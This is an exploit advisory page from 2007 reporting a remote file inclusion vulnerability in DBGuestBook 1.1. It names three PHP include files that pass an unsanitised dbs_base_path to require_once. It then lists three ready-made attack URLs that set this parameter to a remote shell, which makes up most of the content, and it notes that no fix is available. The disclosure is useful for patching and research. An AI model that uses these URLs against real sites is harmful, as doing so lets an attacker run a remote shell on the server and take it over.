DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities

2007-02-21 00:00:00

DBGuestBook 1.1

*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=2
*****************
ERROR:

includes/utils.php require_once $dbs_base_path
includes/guestbook.php require_once $dbs_base_path
includes/views.php require_once $dbs_base_path



**************************************************************************************
RFI:

http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]


**************************************************************************************
denven[at]gmail[dot]com

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.